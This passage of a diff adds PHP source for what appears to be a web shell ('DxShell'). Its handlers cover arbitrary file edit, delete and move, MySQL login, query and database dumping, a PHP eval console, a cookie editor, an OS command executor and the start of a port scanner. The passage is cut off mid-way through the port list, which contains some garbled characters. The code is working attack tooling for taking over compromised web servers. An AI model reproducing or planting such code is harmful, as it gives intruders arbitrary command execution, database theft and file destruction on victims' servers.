+######## File Edit +######## +if ($_GET['dxmode']=='F_ED') + { + if (!is_file($_GET['dxfile'])) die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) ')); + if (isset($_POST['dxparam'])) + { if (!is_writable($_GET['dxfile'])) die(DxError('File is not writable. Perms?...')); + if (($f=fopen($_GET['dxfile'], 'w'))===FALSE) die(DxError('File open for WRITE failed')); + if (fputs($f, $_POST['dxparam'])===FALSE) die(DxError('I/O: File write failed')); + fclose($f); + print 'File saved OK;'; + } + else + { + if (!is_readable($_GET['dxfile'])) die(DxError('File is not readable. Perms?...')); + if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!'); print "\n".'<font class=highlight_txt>'.$_GET['dxfile'].'</font>'; + print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n".'<textarea name="dxparam" rows=30 style="width:90%;">'.str_replace(array('<','>'),array('&lt;','&gt;'), file_get_contents($_GET['dxfile'])).'</textarea>'; + print "\n".'<br><input type=submit value="Save" style="width:100pt;height:50pt;font-size:15pt;" class=submit>'; + print "\n".'</form>'; + } + } + +######## +######## File Delete +######## +if ($_GET['dxmode']=='F_DEL') + { if (isset($_GET['dx_ok'])) + { if ($_GET['dx_ok']=='Yes') + { if ( (is_file($_GET['dxfile']) AND !unlink($_GET['dxfile'])) OR (is_dir($_GET['dxfile']) AND !rmdir($_GET['dxfile'])) ) + print DxError('Unable to delete file. Perms?...<br>'); + else + { print "\n".'Delete( <font class=highlight_txt>'.$_GET['dxfile'].'</font> ) <b>OK</b>'; + DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile']))); + } + } + } + else + { + if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!'); print "\n".'<form action="'.DxURL('kill', '').'" method=GET>'; + DxGETinForm('leave', 'dxmode,dxfile'); + print "\n".'<table border=0 cellspacing=0 cellpadding=0 align=center><tr><td>' + ."\n".'<font class=achtung>(!)</font> Do you really want to <font class=highlight_txt>DELETE '.$_GET['dxfile'].'</font> ?' + ."\n".'<div align=right><input type=submit name="dx_ok" value="No" class=bt_No><input type=submit name="dx_ok" value="Yes" class=bt_Yes>' + ."\n".'</td></tr></table>'; + print "\n".'</form>'; + } + } + +######## +######## File Rename +######## +if ($_GET['dxmode']=='F_REN') + { + if (isset($_POST['dxparam'])) + { + if (!rename($_GET['dxfile'], dirname($_GET['dxfile']).'/'.$_POST['dxparam'])) + print DxError('Unable to rename. Perms?...<br>'); + else + { + print "\n".'Rename( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.dirname($_GET['dxfile']).'/'.$_POST['dxparam'].'</font> ) <b>OK</b>'; + DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile']))); + } + } + else + { + print "\n".'<form action="'.DxURL('leave', 'dxmode,dxfile').'" method=POST>'; + print "\n".'<input type=text name="dxparam" value="'.basename($_GET['dxfile']).'" style="width:80%">'; + print "\n".'<input type=submit value="Rename" class="submit"></form>'; + } + } + +######## +######## File Copy +######## +if ($_GET['dxmode']=='F_COP') + { + if (!is_file($_GET['dxfile'])) die(DxError('Don\'t even think about copuing directories! =))')); + + $newname=$_GET['dxfile'].'__DxS_COPY_'.DxRandomChars(3); + if (($extpos=strrpos($_GET['dxfile'], '.'))>strrpos($_GET['dxfile'], '/')) /* file has an extension */ + $newname=substr($_GET['dxfile'], 0, $extpos).'__DxS_COPY_'.DxRandomChars(3).substr($_GET['dxfile'], $extpos); + print $newname; + if (!copy($_GET['dxfile'], $newname)) + print DxError('Unable to copy. Perms?...<br>'); + else + { + print "\n".'Copy( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.$newname.'</font> ) <b>OK</b>'; + DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile']))); + } + } + +######## +######## File Move +######## +if ($_GET['dxmode']=='F_MOV') + { + if (isset($_POST['dxparam'])) + { + if (!rename($_GET['dxfile'], $_POST['dxparam'])) + print DxError('Unable to rename. Perms? Or no path?...<br>'); + else + { + print "\n".'Move( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.$_POST['dxparam'].'</font> ) <b>OK</b>'; + DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_POST['dxparam']))); + } + } + else + { + if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!'); + print "\n".'<form action="'.DxURL('leave', 'dxmode,dxfile').'" method=POST>'; + print "\n".'<input type=text name="dxparam" value="'.DxFileOkaySlashes(realpath($_GET['dxfile'])).'" style="width:80%">'; + print "\n".'<input type=submit value="M0ve" class="submit"></form>'; + } + } + +if (substr($_GET['dxmode'],0,2)=='F_') + {/* file actions */ + print "\n\n".'<br><br>'.'<a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])).'">[Go DIR]</a>'; + } + + ################################### + +######## +######## SQL Maintenance +######## +if ($_GET['dxmode']=='SQL') + { if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p'])) + { print "\n".'<h2>MySQL connection</h2>'; + print "\n".'<form action="'.DxURL('kill', '').'" method=GET align=center>'; + DxGETinForm('leave', 'dxmode'); + print "\n".'<br>Serv: <input type=text name="dxsql_s" value="localhost" style="width:200pt">'; + print "\n".'<br>Login:<input type=text name="dxsql_l" value="" style="width:200pt">'; + print "\n".'<br>Passw:<input type=password name="dxsql_p" value="" style="width:200pt">'; + print "\n".'<br><input type=submit value="C0nnect" class="submit" style="width:200pt;"></form>'; + die(); + } + if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0)) + die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error())); + else print '&gt;&gt; MySQL connected!'; + + $mysqlver=mysql_fetch_row(mysql_query("SELECT VERSION()")); + print str_repeat('&nbsp;',15).'MySQL version: <font class="highlight_txt">'.$mysqlver[0].'</font>'; + + DxMySQL_FetchResult(DxMySQLQ('SHOW DATABASES;', true), $DATABASES, true); + for ($i=0;$i<count($DATABASES);$i++) + $DATABASES[$i][1]=mysql_num_rows(DxMySQLQ('SHOW TABLES FROM `'.$DATABASES[$i][0].'`;', false)); + + print "\n".'<table border=0 cellspacing=0 cellpadding=0>' + .'<tr><td class=h2_oneline><h1>DB:</h1></td>'; + if (!isset($_GET['dxsql_d'])) + { + print "\n".'<td class=h2_oneline style="border-width:0pt;">'; + print "\n".'<form action="'.DxURL('kill', '').'" method=GET>'; + DxGETinForm('leave', 'dxmode,dxsql_s,dxsql_l,dxsql_p'); + print "\n".'<SELECT name="dxsql_d" onchange="this.form.submit()">'; + print "\n\t".'<OPTION value="">&lt;Server&gt;</OPTION>'; + for ($i=0;$i<count($DATABASES);$i++) + print "\n\t".'<OPTION value="'.$DATABASES[$i][0].'">' + .'['.DxZeroedNumber($DATABASES[$i][1],3).']'.' '.$DATABASES[$i][0] + .'</OPTION>'; + print "\n".'</SELECT><input type=submit value="-&gt;" class=submit"></form></td>'; + print "\n".'</tr></table>'; + die(); + } + else print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td>' + .'<td class=linelisting><a href="'.DxURL('kill', 'dxsql_d').'" class=no>[CH]</a></td>' + .'<td class=linelisting><a href="'.DxURL('kill', 'dxmode').'&dxmode=SQLS" class=no>[Search in tables...]</a></td>' + .'<td class=linelisting><a href="'.DxURL('kill', 'dxmode').'&dxmode=SQLD" class=no>[Dump...]</a></td>' + .'</tr></table>'; + + if (!empty($_GET['dxsql_d'])) + if (!mysql_select_db($_GET['dxsql_d'])) + die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error())); + + print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>'; + print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">'; + if (!empty($_GET['dxsql_d'])) + { + print "\n\t".'<table border=0 cellspacing=0 cellpadding=0>'; + print "\n\t".'<caption>Tables:</caption>'; + DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true); + for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0]; + asort($TABLES); + for ($i=0;$i<count($TABLES);$i++) + { + DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true); print "\n\t".'<tr><td class="listing"><nobr>'.(($TRowCnt[0][0]>0)?'&gt; ':'&nbsp;&nbsp;').$TABLES[$i].'</td></tr>'; + } + print "\n\t".'</table>'; + } + print "\n".'</td><td width=100%>'; + print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n".'[?] Can run several querys if divided by ";"<br>If smth is wrong with charset, write first: SET NAMES cp1251;'; + print "\n".'<textarea name="dxsql_q" rows=10 style="width:100%;">'.((empty($_POST['dxsql_q']))?'':$_POST['dxsql_q']).'</textarea>'; + print "\n".'<div align=right>' + .'<input type=submit value="Query" class="submit"> ' + .'<input type=submit name="dxparam" value="Download Query" class="submit"></div></form>' + .'<br>'; + + if (empty($_POST['dxsql_q'])) die('</td></tr></table>'); + $_POST['dxsql_q']=explode(';', $_POST['dxsql_q']); + + foreach ($_POST['dxsql_q'] as $CUR_Q) + { if (empty($CUR_Q)) continue; + $CUR_Q.=';'; + + $num=DxMySQL_FetchResult(DxMySQLQ($CUR_Q, true), $FETCHED, false); + if ($num<=0) continue; + + print "\n\n\n".'<table border=0 cellspacing=0 cellpadding=0><caption>'.$CUR_Q.'</caption>'; + + $INDEXES=array_keys($FETCHED[0]); + print "\n\t".'<tr><td class="listing" colspan='.(count($INDEXES)+1).'>&gt;&gt; Fetched: '.$num. str_repeat('&nbsp;', 10). 'Affected: '.mysql_affected_rows().'</td></tr>'; + print "\n\t".'<tr><td class="listing"><div align=center class="highlight_txt">###</td>'; + foreach ($INDEXES as $key) print '<td class="listing"><div align=center class="highlight_txt">'.$key.'</td>'; + print '</tr>'; + + for ($l=0;$l<count($FETCHED);$l++) + { + print "\n\t".'<tr><td class="listing" width=40><div align=right class="highlight_txt">'.$l.'</td>'; + for ($i=0; $i<count($INDEXES); $i++) + print '<td class="listing"> '.DxDecorVar($FETCHED[$l][ $INDEXES[$i] ], true).'</td>'; + } + + print "\n".'</table><br>'; + } + print "\n".'</td></tr></table>'; + } + +######## +######## SQL Search +######## +if ($_GET['dxmode']=='SQLS') + { + if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p'], $_GET['dxsql_d'])) die(DxError('SQL server/login/password/database are not set')); + + if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0)) + die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error())); + else print '&gt;&gt; MySQL connected!'; + + if (!mysql_select_db($_GET['dxsql_d'])) + die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error())); + + print "\n".'<table border=0 cellspacing=0 cellpadding=0><tr><td class=h2_oneline><h2>DB:</h2></td>'; + print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td></tr></table>'; + + print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>'; + print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">'; + + DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true); + for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0]; + asort($TABLES); + + if (isset($_POST['dxsqlsearch']['txt'])) + if (get_magic_quotes_gpc()==1) $_POST['dxsqlsearch']['txt']=stripslashes($_POST['dxsqlsearch']['txt']); + + print "\n\t".'<SELECT MULTIPLE name="dxsqlsearch[tables][]" SIZE=30>'; + for ($i=0;$i<count($TABLES);$i++) + { + DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true); + if ($TRowCnt[0][0]>0) + print "\n\t".'<OPTION value="'.$TABLES[$i].'" ' + .( (isset($_POST['dxsqlsearch']['tables']))? ((in_array($TABLES[$i], $_POST['dxsqlsearch']['tables']))?'SELECTED':'') :'SELECTED' ).'>' + .$TABLES[$i].'</OPTION>'; + } + print "\n\t".'</SELECT>'; + print "\n".'</td><td width=100%>'; + print "\n".'<input type=text name="dxsqlsearch[txt]" style="width:100%;" value="'.((empty($_POST['dxsqlsearch']['txt']))?'':str_replace('"', '&quot;', $_POST['dxsqlsearch']['txt'])).'">'; + print "\n".'<br>'; + foreach (array('Any', 'Each', 'Exact', 'RegExp') as $cur_rad) + print '<input type=radio name="dxsqlsearch[mode]" value="'.strtolower($cur_rad).'" ' + .( (isset($_POST['dxsqlsearch']['mode']))? (($_POST['dxsqlsearch']['mode']==strtolower($cur_rad))?'CHECKED':'') :(($cur_rad=='Any')?'CHECKED':'') ) + .' class=radio>'.$cur_rad.'&nbsp;&nbsp;&nbsp;'; + print "\n".'<div align=right><input type=submit value="Search..." class=submit style="width:100pt;"></div>'; + print "\n".'</form>'; + + if (!isset($_POST['dxsqlsearch'])) die('</td></tr></table>'); + + if (empty($_POST['dxsqlsearch']['tables'])) die(DxError('No tables selected')); + + if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'each'))) $_POST['dxsqlsearch']['txt']=explode(' ', mysql_real_escape_string($_POST['dxsqlsearch']['txt'])); + else $_POST['dxsqlsearch']['txt']=array($_POST['dxsqlsearch']['txt']); + + + $GLOBALFOUND=0; + foreach ($_POST['dxsqlsearch']['tables'] as $CUR_TABLE) + { $Q='SELECT * FROM `'.$CUR_TABLE.'` WHERE '; + $Q_ARR=array(); + DxMySQL_FetchResult(DxMySQLQ('SHOW COLUMNS FROM `'.$CUR_TABLE.'`;', true), $COLS, true); for ($i=0; $i<count($COLS);$i++) $COLS[$i]=$COLS[$i][0]; + foreach ($COLS as $CUR_COL) + { if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'each', 'exact'))) + { for ($i=0;$i<count($_POST['dxsqlsearch']['txt']);$i++) + $Q_ARR[]=$CUR_COL.' LIKE "%'.($_POST['dxsqlsearch']['txt'][$i]).'%"'; + } + else $Q_ARR[]=$CUR_COL.' REGEXP '.$_POST['dxsqlsearch']['txt'][0]; + + if ($_POST['dxsqlsearch']['mode']=='each') + { $Q_ARR_EXACT[]=implode(' AND ', $Q_ARR); + $Q_ARR=array(); + } + } + if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'exact'))) $Q.=implode(' OR ', $Q_ARR).';'; + if ($_POST['dxsqlsearch']['mode']=='each') $Q.=' ( '.implode(' ) OR ( ', $Q_ARR_EXACT).' );'; + if ($_POST['dxsqlsearch']['mode']=='regexp') $Q.=' ( '.implode(' ) OR ( ',$Q_ARR).' );'; + + /* $Q is ready */ + + if (($num=DxMySQL_FetchResult(DxMySQLQ($Q, true), $FETCHED, true))>0) + { + $GLOBALFOUND+=$num; print "\n\n".'<table border=0 cellspacing=0 cellpadding=0 align=center><caption>'.$num.' matched in '.$CUR_TABLE.' :</caption>'; + print "\n\t".'<tr><td class=listing><font class="highlight_txt">'.implode('</td><td class=listing><font class="highlight_txt">', $COLS).'</td></tr>'; + for ($l=0;$l<count($FETCHED);$l++) + { + print "\n\t".'<tr>'; + for ($i=0; $i<count($FETCHED[$l]); $i++) print '<td class="listing"> '.DxDecorVar($FETCHED[$l][$i], true).'</td>'; + print '</tr>'; + } + print "\n".'</table><br>'; + } + } + print "\n".'<br>Total: '.$GLOBALFOUND.' matches'; + + print "\n".'</td></tr></table>'; + } + +######## +######## SQL Dump +######## +if ($_GET['dxmode']=='SQLD') + { if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p'], $_GET['dxsql_d'])) die(DxError('SQL server/login/password/database are not set')); + + if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0)) + die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error())); + else print '&gt;&gt; MySQL connected!'; + + if (!mysql_select_db($_GET['dxsql_d'])) + die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error())); + + print "\n".'<table border=0 cellspacing=0 cellpadding=0><tr><td class=h2_oneline><h2>DB:</h2></td>'; + print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td></tr></table>'; + + print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>'; + print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">'; + + DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true); + for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0]; + asort($TABLES); + + print "\n\t".'<SELECT MULTIPLE name="dxsql_tables[]" SIZE=30>'; + for ($i=0;$i<count($TABLES);$i++) + { + DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true); + if ($TRowCnt[0][0]>0) + print "\n\t".'<OPTION value="'.$TABLES[$i].'" SELECTED>'.$TABLES[$i].'</OPTION>'; + } + print "\n\t".'</SELECT>'; + print "\n".'</td><td width=100%>You can set a pre-dump-query(s) (ex: SET NAMES cp1251; ):'; + print "\n".'<input type=text name="dxsql_q" style="width:100%;">'; + print "\n".'<br>'; + print "\n".'<div align=right>' + .'GZIP <input type=checkbox name="dx_gzip" value="Yeah, baby">'.str_repeat('&nbsp;', 10) + .'<input type=submit value="Dump!" class=submit style="width:100pt;"></div>'; + print "\n".'</form>'; + } + + ################################### + +######## +######## PHP Console +######## +if ($_GET['dxmode']=='PHP') + { + if (isset($_GET['dxval'])) $_POST['dxval']=$_GET['dxval']; + + print "\n".'<table border=0 align=right><tr><td class=h2_oneline>Do</td><td class="linelisting">'; + $PRESETS=array_keys($GLOB['VAR']['PHP']['Presets']); + for ($i=0; $i<count($PRESETS);$i++) + print "\n\t".'<a href="'.DxURL('leave', 'dxmode').'&dxval=dxpreset__'.$PRESETS[$i].'" class=no>['.$PRESETS[$i].']</a>' + .( ($i==(count($PRESETS)-1))?'':str_repeat('&nbsp;',3) ); + print "\n\n".'</td></tr></table><br><br>'; + + if (isset($_POST['dxval'])) + if (strpos($_POST['dxval'], 'dxpreset__')===0) + { $_POST['dxval']=substr($_POST['dxval'], strlen('dxpreset__')); + if (!isset($GLOB['VAR']['PHP']['Presets'][$_POST['dxval']])) die(DxError('Undeclared preset')); + $_POST['dxval']=$GLOB['VAR']['PHP']['Presets'][$_POST['dxval']]; + } + + print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n".'<textarea name="dxval" rows=15 style="width:100%;">'.((isset($_POST['dxval']))?$_POST['dxval']:'').'</textarea>'; + print "\n".'<div align=right><input type=submit value="Eval" class="submit" style="width:200pt;"></div>'; + print "\n".'</form>'; + if (isset($_POST['dxval'])) + { print str_repeat("\n", 10).'<!--php_eval-->'."\n\n".'<table border=0 width=100%><tr><td class=listing>'."\n\n"; + eval($_POST['dxval']); + print str_repeat("\n", 10).'<!--/php_eval-->'.'</td></tr></table>'; + } + } + + ################################### + +######## +######## Cookies Maintenance +######## +if ($_GET['dxmode']=='COOK') + { + if ($DXGLOBALSHIT) DxWarning('Set cookie may fail. This is because "'.basename($_SERVER['PHP_SELF']).'" has fucked up the output with it\'s shit =('); print 'Found <font class="highlight_txt">'.($CNT=count($_COOKIE)).' cookie'.(($CNT==1)?'':'s'); + + print "\n".'<div align=right><a href="'.DxURL('leave', '').'">[RELOAD]</a></div>'; + + print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n".'<table border=0 align=center><tr><td class=linelisting><div align=center><font class="highlight_txt">Cookie name</td><td class=linelisting><div align=center><font class="highlight_txt">Value</td></tr>'; + for ($look_len=1, $maxlen=0; $look_len>=0;$look_len--) + { + if ($maxlen>100) $maxlen=100; + if ($maxlen<30) $maxlen=30; + $maxlen+=3; + for ($INDEXES=array_keys($_COOKIE), $i=0;$i<count($INDEXES);$i++) + { + if ($look_len) {if (strlen($_COOKIE[ $INDEXES[$i] ])>$maxlen) {$maxlen=strlen($_COOKIE[ $INDEXES[$i] ]);} continue;} + print "\n".'<tr><td class=linelisting>'.$INDEXES[$i].'</td>' + .'<td class=linelisting><input type=text ' + .'name="dxparam['.str_replace(array('"', "\n", "\r", "\t"), array('&quot;',' ',' ',' '), $INDEXES[$i]).']" ' + .'value="'.str_replace(array('"', "\n", "\r", "\t"), array('&quot;',' ',' ',' '), $_COOKIE[ $INDEXES[$i] ]).'" ' + .'SIZE='.$maxlen.'></td>' + .'</tr>'; + } + if (!$look_len) + { + print "\n".'<tr><td colspan=2><div align=center>[Set new cookie]</td></tr>'; + print "\n".'<tr><td class=linelisting><input type=text name="dxparam[DXS_NEWCOOK][NAM]" value="" style="width:99%;"></td>' + .'<td class=linelisting><input type=text name="dxparam[DXS_NEWCOOK][VAL]" value="" SIZE='.$maxlen.'></td>' + .'</tr>'; print "\n".'<tr><td class=linelisting colspan=2 style="text-align:center;">' + .'<input type=submit value="Save" class="submit" style="width:50%;">' + .'</td></tr>'; + } + } + print "\n".'</table></form>'; + } + + ################################### + +######## +######## Command line +######## +if ($_GET['dxmode']=='CMD') + { + print "\n".'<table border=0 align=right><tr><td class=h2_oneline>Do</td><td>'; + print "\n".'<SELECT name="selector" onchange="document.getElementById(\'dxval\').value+=document.getElementById(\'selector\').value+\'\n\'" style="width:200pt;">'; + print "\n\t".'<OPTION></OPTION>'; + $PRESETS=array_keys($GLOB['VAR']['CMD']['Presets']); + for ($i=0; $i<count($PRESETS);$i++) + print "\n\t".'<OPTION value="'.str_replace('"','&quot;',$GLOB['VAR']['CMD']['Presets'][ $PRESETS[$i] ]).'">'.$PRESETS[$i].'</OPTION>'; + print "\n\n".'</SELECT></td></tr></table><br><br>'; + + if (isset($_POST['dxval'])) + if (strpos($_POST['dxval'], 'dxpreset__')===0) + { + $_POST['dxval']=substr($_POST['dxval'], strlen('dxpreset__')); + if (!isset($GLOB['VAR']['CMD']['Presets'][$_POST['dxval']])) die(DxError('Undeclared preset')); + $_POST['dxval']=$GLOB['VAR']['CMD']['Presets'][$_POST['dxval']]; + } + + $warnstr=DxExecNahuj('',$trash1, $trash2); + if (!$warnstr[1]) DxWarning($warnstr[2]); print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n".'<textarea name="dxval" rows=5 style="width:100%;">'.((isset($_POST['dxval']))?$_POST['dxval']:'').'</textarea>'; + print "\n".'<div align=right>' + .'<input type=submit value="Exec" class="submit" style="width:100pt;"> ' + .'</div>'; + print "\n".'</form>'; + if (isset($_POST['dxval'])) + { + $_POST['dxval']=split("\n", str_replace("\r", '', $_POST['dxval'])); + for ($i=0; $i<count($_POST['dxval']); $i++) + { + $CUR=$_POST['dxval'][$i]; + if (empty($CUR)) continue; + + DxExecNahuj($CUR,$OUT, $RET); + print str_repeat("\n", 10).'<!--'.$warnstr[2].'("'.$CUR.'")-->'."\n\n".'<table border=0 width=100%><tr><td class=listing>'."\n\n"; + + print '<span style="position:absolute;left:10%;" class="highlight_txt">Return</span>'; + print '<span style="position:absolute;right:30%;" class="highlight_txt">Output</span>'; + print '<br><nobr>'; + print "\n".'<textarea rows=10 style="width:20%;display:inline;">'.$CUR."\n\n".( (is_array($RET))?implode("\n", $RET):$RET).'</textarea>'; + print "\n".'<textarea rows=10 style="width:79%;display:inline;">'."\n".( (is_array($OUT))?implode("\n", $OUT):$OUT).'</textarea>'; + print '</nobr>'; + print str_repeat("\n", 10).'<!--/'.$warnstr[2].'("'.$CUR.'")-->'."\n\n".'</td></tr></table>'; + } + } + } + + ################################### + +######## +######## String functions +######## +if ($_GET['dxmode']=='STR') + { + if (isset($_POST['dxval'], $_POST['dxparam'])) + { $crypted=''; + if ($_POST['dxparam']=='md5') $crypted.=md5($_POST['dxval']); + if ($_POST['dxparam']=='sha1') $crypted.=sha1($_POST['dxval']); + if ($_POST['dxparam']=='crc32') $crypted.=crc32($_POST['dxval']); + if ($_POST['dxparam']=='2base') $crypted.=base64_encode($_POST['dxval']); + if ($_POST['dxparam']=='base2') $crypted.=base64_decode($_POST['dxval']); + if ($_POST['dxparam']=='2HEX') for ($i=0;$i<strlen($_POST['dxval']);$i++) $crypted.=strtoupper(dechex(ord($_POST['dxval'][$i]))).' '; + if ($_POST['dxparam']=='HEX2') {$_POST['dxval']=str_replace(' ','',$_POST['dxval']); for ($i=0;$i<strlen($_POST['dxval']);$i+=2) $crypted.=chr(hexdec($_POST['dxval'][$i].$_POST['dxval'][$i+1]));} + if ($_POST['dxparam']=='2DEC') {$crypted='CHAR('; for ($i=0;$i<strlen($_POST['dxval']); $i++) $crypted.=ord($_POST['dxval'][$i]).(($i<(strlen($_POST['dxval'])-1))?',':')');} + if ($_POST['dxparam']=='2URL') $crypted.=urlencode($_POST['dxval']); + if ($_POST['dxparam']=='URL2') $crypted.=urldecode($_POST['dxval']); + } + if (isset($crypted)) print $_POST['dxparam'].'(<font class="highlight_txt"> '.$_POST['dxval'].' </font>) = '; + print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n".'<textarea name="dxval" rows=20 style="width:100%;">'.((isset($crypted))?$crypted:'').'</textarea>'; + print "\n".'<div align=right>' + .'<input type=submit name="dxparam" value="md5" class="submit" style="width:50pt;"> ' + .'<input type=submit name="dxparam" value="sha1" class="submit" style="width:50pt;"> ' + .'<input type=submit name="dxparam" value="crc32" class="submit" style="width:50pt;"> '.str_repeat('&nbsp;', 5) + .'<input type=submit name="dxparam" value="2base" class="submit" style="width:50pt;"> ' + .'<input type=submit name="dxparam" value="base2" class="submit" style="width:50pt;"> ' + .'<input type=submit name="dxparam" value="2HEX" class="submit" style="width:50pt;"> ' + .'<input type=submit name="dxparam" value="HEX2" class="submit" style="width:50pt;"> ' + .'<input type=submit name="dxparam" value="2DEC" class="submit" style="width:50pt;"> ' + .'<input type=submit name="dxparam" value="2URL" class="submit" style="width:50pt;"> ' + .'<input type=submit name="dxparam" value="URL2" class="submit" style="width:50pt;"> ' + .'</div>'; + print "\n".'</form>'; + } + +######## +######## Port scaner +######## +if ($_GET['dxmode']=='PRT') + { + print '[!] For complete portlist go to <a href="http://www.iana.org/assignments/port-numbers" target=_blank>http://www.iana.org/assignments/port-numbers</a>'; if (isset($_POST['dxportscan']) or isset($_GET['dxparam'])) + $DEF_PORTS=array (1=>'tcpmux (TCP Port Service Multiplexer)',2=>'Management Utility',3=>'Compression Process',5=>'rje (Remote Job Entry)',7=>'echo',9=>'discard',11=>'systat',13=>'daytime',15=>'netstat',17=>'quote of the day',18=>'send/rwp',19=>'character generator',20=>'ftp-data',21=>'ftp',22=>'ssh, pcAnywhere',23=>'Telnet',25=>'SMTP (Simple Mail Transfer)',27=>'ETRN (NSW User System FE)',29=>'MSG ICP',31=>'MSG Authentication',33=>'dsp (Display Support Protocol)',37=>'time',38=>'RAP (Route Access Protocol)',39=>'rlp (Resource Location Protocol)',41=>'Graphics',42=>'nameserv, WINS',43=>'whois, nickname',44=>'MPM FLAGS Protocol',45=>'Message Processing Module [recv]',46=>'MPM [default send]',47=>'NI FTP',48=>'Digital Audit Daemon',49=>'TACACS, Login Host Protocol',50=>'RMCP, re-mail-ck',53=>'DNS',57=>'MTP (any private terminal access)',59=>'NFILE',60=>'Unassigned',61=>'NI MAIL',62=>'ACA Services',63=>'whois++',64=>'Communications Integrator (CI)',65=>'TACACS-Database Service',66=>'Oracle SQL*NET',67=>'bootps (Bootstrap Protocol Server)',68=>'bootpd/dhcp (Bootstrap Protocol Client)',69=>'Trivial File Transfer Protocol (tftp)',70=>'Gopher',71=>'Remote Job Service',72=>'Remote Job Service',73=>'Remote Job Service',74=>'Remote Job Service',75=>'any private dial out service',76=>'Distributed External Object Store',77=>'any private RJE service',78=>'vettcp',79=>'finger',80=>'World Wide Web HTTP',81=>'HOSTS2 Name Serve',82=>'XFER Utility',83=>'MIT ML Device',84=>'Common Trace Facility',85=>'MIT ML Device',86=>'Micro Focus Cobol',87=>'any private terminal link',88=>'Kerberos, WWW',89=>'SU/MIT Telnet Gateway',90=>'DNSIX Securit Attribute Token Map',91=>'MIT Dover Spooler',92=>'Network Printing Protocol',93=>'Device Control Protocol',94=>'Tivoli Object Dispatcher',95=>'supdup',96=>'DIXIE',98=>'linuxconf',99=>'Metagram Relay',100=>'[unauthorized use]',101=>'HOSTNAME',102=>'ISO, X.400, ITOT',103=>'Genesis Point-to&#14144;&#429;oi&#65535;&#65535; T&#0;&#0;ns&#0;&#0;et',104=>'ACR-NEMA Digital Imag. & Comm. 300',105=>'CCSO name server protocol',106=>'poppassd',107=>'Remote Telnet Service',108=>'SNA Gateway Access Server',109=>'POP2',110=>'POP3',111=>'Sun RPC Portmapper',112=>'McIDAS Data Transmission Protocol',113=>'Authentication Service',115=>'sftp (Simple File Transfer Protocol)',116=>'ANSA REX Notify',117=>'UUCP Path Service',118=>'SQL 